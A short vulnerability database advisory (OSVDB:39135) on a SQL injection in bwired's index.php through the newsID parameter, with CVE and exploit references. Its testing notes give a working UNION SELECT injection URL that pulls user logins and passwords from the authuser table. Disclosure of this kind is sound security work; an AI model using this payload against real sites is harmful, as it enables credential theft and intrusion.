bwired index.php newsID Variable SQL Injection

2007-07-22T00:00:00
ID OSVDB:39135
Type osvdb
Reporter OSVDB
Modified 2007-07-22T00:00:00

Description

Manual Testing Notes

http://[target]/[pathtobwired]/index.php?newsID=-99%20union%20all%20select1,2,concat(user_login,0x20,0x3a,0x20,user_passwd),4,5,6, 7, 8, 9, 10, 11%20from%20authuser

References:

ISS X-Force ID: 35540 Generic Exploit URL: http://www.milw0rm.com/exploits/4213 FrSIRT Advisory: ADV-2007-2612 CVE-2007-3976